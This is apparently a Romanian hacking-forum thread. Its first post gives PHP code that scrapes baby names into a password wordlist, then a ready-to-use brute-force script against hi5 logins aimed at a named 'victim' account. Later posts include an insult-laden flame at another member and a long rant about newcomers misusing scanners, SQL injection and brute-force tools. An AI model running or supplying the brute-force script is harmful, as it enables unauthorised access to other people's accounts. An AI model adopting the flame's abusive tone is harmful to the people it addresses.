Leaderboard

O idee mai veche de-a mea (de se spargea kw3 de ras) despre cum sa iti faci un dictionar pentru brute force. Precum se stie multi isi pun ca parole nume proprii. Ok, de unde sa luam un astfel de dictionar. O idee: siturile de bebelushi. Pentru ca este o moda de a publica liste intregi de nume de botezat bebeii, care site are mai multe, e mai respectabil. Am luat si eu un site de bebe si am facut niste spicuiri in php. Rezultatul: un words.txt numai bun pentru un brutus sau ce mai aveti prin casa. <? $link="http://www.util21.ro/invatamant/nume-copii/nume-baietei-incepand-cu-"; // $link="http://www.util21.ro/invatamant/nume-copii/nume-fetite-incepand-cu-"; $fisier=""; for ($i=0; $i<26; $i++) { $page=$link.chr($i+97).".htm"; $text=file_get_contents($page); $nume=explode('<span class="numecopii">',$text); for($j=0; $j<count($nume); $j++) { $temp=explode("</span>",$nume[$j+1]); $fisier.=$temp[0]."<br>"; } } $fisier=strtolower (ereg_replace(':','',$fisier)); $fisier=ereg_replace(';','',$fisier); $fisier=ereg_replace('/','<br>',$fisier); $fisier=ereg_replace('<br><br>','<br>',$fisier); echo $fisier; $fisier=ereg_replace('<br>','\r\n',$fisier); file_put_contents("words.txt",$fisier); ?> Pentru fetite comment prima linie si uncomment a doua. PS Acum puteti sa va numiti bebeii dintr-o privire Si o aplicatie practica: brute force hi5 <? $victim="victim@yahoo.com"; // replace cu victima $words=file_get_contents("words.txt"); $words=explode("\r\n",$words); for ($i=0; $i<count($words); $i++) { $page=file_get_contents("http://m.hi5.com/friend/mobile/login/processLogin.do?email=".$victim."&password=".$words[$i]); // echo $words[$i]."<br>".$page; if(stristr($page, 'Error') === FALSE) echo "Parola lui ".$victim." este ".$words[$i]; } ?>

@prodil89 Domnule prodil (iti spun domnule pt. ca pe drumul tau presarat cu pietricele modelate dupa forma neuronului tau in stare avansata de descompunere nu te vei mai intalni cu un astfel de apelativ), cu tot respectul, te-as trage de maneca sa aterizezi, dar pacat ca esti in maieu. Esti cretin? Stai, nu-mi raspunde acum. Scutura bine tastatura de firimituri, si cu ele satura-i pe cei cu gandirea ta infecta. Imi cer scuze ca trag concluzii logice. Acum, fii onest. Cand mergi pe strada, asculti in casti varianta extended a hitului "Inspira... Expira"? Sau e versiunea simpla care-ti blocheaza circuitele de la mansarda? Si acum, inca un exercitiu de sinceritate. Cand ai scris asta era in stare de ebrietate avansata? Have a look: Nu te obosi sa-mi raspunzi. Asa se intampla in Romania, la maternitate se "extrage" din incubator copilul care duhneste cel mai mult a alcool. Dupa ce-ti dai singur o dedicatie pe Taraf TV, revin-o cu o replica cretina de a ta. Hai ca poti mai mult... decat sa dovedesti ca arborele genealogic din care te tragi e putrezit inca de la radacina. Si asta e cireasa de pe tort. Apogeul carierei tale de cretinoid: De ce eu n-am nevoie de injuraturi ca sa-ti dau un ownage? LE: Si voi de ce prostilor faceti topicuri despre Huidu? Parca nu se mai gasesc basisti care stiu sa citeasca, eventual sa invete replici.

tu esti, pacone? Sau ai venit sa mi te-n BAN? EDIT: Hai sa il mut in tutoriale - altfel o mai vrea si altii PHP compilat in EXE

Sunt deja 2 ani de cand frecventez acest forum , probabil am mai frecventat si altele pana acum dar peste tot sunt aceleasi lucruri In rest in unele locuri probabil exista si resctrictii sau ma rog nu poti sa postezi decat daca este ceva important sau profesional Intotdeauna vin , vor venii altii noi care probabil incep sa invete aceleasi lucruri pe care altii le stiu deja Problema nu este invatatul ci cum se invata Daca nu ma insel in fiecare zii vin dezbatute o gramada de probleme care au fost deja rezolvate de prea multe ori Asta face din topicuri un fel de helpdesk Cine este vinovat? Modul in care noii useri incearca sa invete ceva nu este bun De ce? Deoarece totul in informatica este un puzzle Intrebari de genul cum pot sa sparg un site? , cum sa imi fac un root? ,cum sa fac un exploit ? sau cum sa sparg un password ? sunt intrebari puse aiurea Multi vor root dar nu stiu ce inseamna , multi fac bruteforce dar nu isi dau seama ca vin banati sau accesul le vine blocat dupa cateva incercari , multi folosesc spre exemplu metasploit autopwn care arunca exploit-uri in prostie fara sa faca vreo deosebire intrun sistem Windows based si unul Unix based Altii vin cu tot felul de cereri pt scannere , bucati de cod scrise in diverse limbaje de programare , tool-uri automate pt diverse servicii Le descarca in calculator si le folosesc pe diverse range-uri de ip fara sa isi dea seama pe cine scaneaza sau ataca Poate multi se vor intreba de ce nu reusesc tot timpul in ceea ce isi propun? Raspunsul este foarte simplu ,cum am mai zis mai devreme informatica este ca un puzzle, daca bucatile nu vin puse cap la cap nu iese nimic O afirmatie adevarata ar fi urmatoarea: Daca careva nu cunoaste protocoalele de baza spre exemplu TCP/IP mai bine nu intra pe internet Sau mai bine intra doar ca sa faca un chat si sa navigheze cu browser-ul Pt a folosi scanere , tool-uri sau oricare program care se conecteaza la internet necesita cunostintele de baza pt TCP/IP Nu va puneti intrebarea cum sa scanati un host , mai bine intrebati-va ce se intampla cand rulez scannerul Trecem la database Este un lucru inutil scannarea si exploatarea host-urilor la intamplare Cum poti sa stii cat de sarata este mancarea daca nu o gusti? Probabil multi au folosit query SQL asupra unui host doar pt faptul ca le-ati gasit in tutoriale in care spun: pasul1 fa asta pasul2 fa asta pasul3 fa asta Cum poti sa mananci supa fara lingura? Faptul ca exista anumite tool-uri automate pt SQLI nu este un lucru rau Faptul ca aceste tool-uri vin folosite fara a cunoaste ce se intampla este un dizastru O alta cerere pe care am intalnit-o pe forum este urmatoarea: Am nevoie de smtp-uri Ok ai nevoie de ele te inteleg dar stii cum functioneaza sau ai nevoie pt un scop dar habar nu ai ce face Inainte de a cere un smtp se studiaza protocolul iar daca nu va intereseaza puteti face spam prin posta cu plicuri cumparate de pe piata Cum sa fac bruteforce? Daca nu cunosti TCP/IP si cum functioneaza serviciile la care vrei sa faci bruteforce , poti face numai bruteforce offline la decriptarea unor hash-uri De ce? Simplu , deoarece de unde ai sa stii daca tool-ul respectiv trimite password-urile la target O alta intrebare De unde iau un SIP scanner? Nui problema de unde il iei , problema e ce faci cu el? Raspuns: Nimic Cum sa obtin root? Pai cum sa obtii root daca nici macar nu stii ce inseamna root Si chiar daca il obtii presupun ca vei folosi un serviciu de tunneling ce vei face? Nimic deoarece nu cunosti comenzile de la shell-ul respectiv Chiar daca te obosesti sa le cunosti vei lasa o gramada de urme deoarece sistemul are un serviciu care logheaza tot ce faci Cum sa atac un server? Mai bine te intrebi care e diferenta intrun client si un server Daca cineva invata lucrurile de baza (bucatile care lipsesc din puzzle) nu mai pune intrebari stupide Nimeni din noi nu sa nascut invatat Eu la randul meu nu stiam nimic Cum poti sa pui ca stii SQLI daca habar nu ai sa configurezi un Server SQL? Ignoranta merge in continuare Am nevoie de un crypter FUD Pai nici nu meriti sa il ai deoarece poti sa iti faci rau cu el Porturile au si ele o valoare Eu vreau sa rulez ssh in 80 Pai 80 este portul pt http Daca careva citeste bucatile de baza din puzzle, intelege ca anumite porturi vin atribuite in mod static pt anumite servicii Spre exemplu de la 0-1023 M-am saturat sa vad lucruri scrise de sute ce ori care nu intra in cap si useri care umple forumurile doar ca sa aiba un numar mare de posturi la status Careva a expus o data problema cu RFI si acum sunt o gramada de useri care incearca sa faca RFI in target-uri luate la intamplare fara sa isi dea seama ca probabil nu se poate face Unele host-uri nu permit sa faci upload de pe un alt url Cand cineva posteaza un tutorial pe forum ,apar o gramada care comenteaza cu comenturi de genul: E tare, Mersi, E ok , +rep Asta ma face sa cred ca ati bagat la cap tot ce scrie acolo Dar dupa o saptamana apar iar topic-uri de tipul helpdesk Forumurile vin umplute cu numarul userilor , posturile in off-topic si o gramada de flame Cum sa fi anonim? Raspuns scurt si la subiect: Nu ai cum. Majoritatea vorbiti de proxy Intrebarea mea este , daca un proxy este public cum poate fi anonim? Sa nu uitam ca multi inca nu stiu ce face un proxy dar il folosesc Sustin in continuare un singur lucru Daca ataci un server pentru ca sa ii faci un deface presupun ca stii ce vulnerabilitate are si cum poti sa o rezolvi E inutil sa creezi o piramida de deface-uri daca nu stii sa repari ceea ce ai stricat Si nu ma refer sa repari un index.html Daca ai reusit sa faci un deface prin SQLI , inseamna ca stii care este problema si esti in grad sa o rezolvi daca te intreaba careva Este foarte usor sa strici un lucru , dar este ,mult mai greu sa il pui la loc Totul are un scop , dar din cate vad lucrurile se invart in jur si stau pe loc Unde este greseala? Lipsesc bucatile din puzzle Rubrica tutoriale este plina , userii ar trebui sa fie experti Din cate vad singurul lucru expert raman tutorialele necitite M-am intrebat de ce oare unii useri parasesc forumurile dupa un timp? Am gasit si raspunsul Pt ca nu mai au ce face , nu au cu cine sa vorbeasca , nu le trebuie umplutura , sau saturat de acelasi lucru Ei au devenit intradevar experti Cuvintele de mai sus le-am scris in speranta ca cineve le va citi si va intelege cum functioneaza lucrurile Cel putin sper sa isi dea seama cat este de important sa cunosti bine bucatile din puzzle Puzzle Art [EDIT]